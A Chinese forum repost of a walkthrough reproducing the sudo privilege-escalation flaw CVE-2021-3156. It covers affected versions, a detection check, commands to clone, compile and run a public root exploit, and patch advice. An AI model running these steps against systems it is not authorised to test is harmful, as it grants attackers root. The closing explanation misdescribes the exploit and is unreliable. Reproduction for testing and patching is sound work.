服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 1223|回复: 0

sudoedit本地提权漏洞利用

[复制链接]
dirtysea 发表于 2021-12-2 16:49:58 | 显示全部楼层 |阅读模式
sudoedit本地提权漏洞利用---CVE-2021-3156 漏洞复现

CVE-2021-3156 漏洞复现

漏洞简介

2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分。

当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。研究人员利用该漏洞在多个Linux发行版上成功获得了完整的root权限,包括Ubuntu 20.04(sudo 1.8.31)、Debian 10(sudo 1.8.27)和Fedora 33(sudo 1.9.2),并且sudo支持的其他操作系统和Linux发行版也很容易受到攻击。

攻击效果

漏洞发生的原因在于sudo错误地转义了参数中的反斜杠。

通常,通过shell(sudo -s或sudo -i)运行命令行时,sudo会转义特殊字符。但 -s 或 -i 也可能被用来运行sudoedit,在这种情况下,实际上特殊字符没有被转义,这就可能导致缓冲区溢出。

利用该漏洞,研究人员在多个Linux发行版上成功获得了完整的root权限,包括Ubuntu 20.04(sudo 1.8.31)、Debian 10(sudo 1.8.27)和Fedora 33(sudo 1.9.2)。并且,Qualys认为,在这种情况下,sudo支持的其他操作系统和Linux发行版也很容易受到攻击,并不能排除风险。

受影响版本

Sudo 1.8.2 – 1.8.31p2
Sudo 1.9.0 – 1.9.5p1

不受影响版本

sudo =>1.9.5p2

漏洞复现

1 查看Linux及sudo版本

lsb_release -a
sudo -V
image

2 简单测试漏洞是否存在

sudoedit -s /
image

3 如果返回“sudoedit:开头的错误”,则当前系统可能存在安全风险;
不受影响的系统将显示“usage:开头的错误”。

image

4 下载exp

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
image

5 编译exp

make
image

6 添加执行权限

chmod a+x sudo-hax-me-a-sandwich
image

7 exp提权测试

./sudo-hax-me-a-sandwich 0
image
提权成功啦!!!!
image

参考文献

信息安全漏洞门户网 :http://cve.scap.org.cn/

修复建议

目前官方已在sudo新版本1.9.5p2中修复了该漏洞,请受影响的用户尽快升级版本进行防护。
下载地址:https://www.sudo.ws/download.html
image

个人理解

sudo执行时本来应该在/usr/lib下搜索动态库,结果这货优先在执行命令的位置搜索,所以这个时候就在编译一个动态态库在当前目录,里边主要就是跳过用户密码验证,直接返回true


来源:https://www.cnblogs.com/20181309lzy/p/14710439.html

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2022-9-28 23:14 , Processed in 0.218701 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表